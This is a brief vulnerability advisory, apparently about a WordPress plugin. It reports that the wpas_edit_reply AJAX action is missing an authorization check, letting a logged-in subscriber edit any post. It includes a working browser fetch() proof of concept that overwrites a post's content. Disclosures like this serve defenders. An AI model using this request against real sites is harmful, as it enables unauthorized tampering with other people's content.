Description The plugin does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.
Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "wpas_edit_reply", "reply_id": "1", "reply_content": "hello"}),
"method": "POST",
"credentials": "include"
});